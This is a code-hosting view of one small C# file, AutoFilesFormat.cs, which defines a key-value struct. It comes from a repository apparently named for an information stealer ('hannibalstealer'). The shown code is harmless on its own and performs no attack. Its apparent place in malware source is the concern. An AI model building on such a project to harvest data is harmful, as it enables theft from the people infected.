Files
hannibalstealer/AutoFilesFormat.cs
2026-08-27 11:22:57 -06:00

16 lines
269 B
C#

namespace SHARP
{
internal struct AutoFilesFormat
{
internal string Key;
internal string Value;
internal AutoFilesFormat(string key, string value)
{
this.Key = key;
this.Value = value;
}
}
}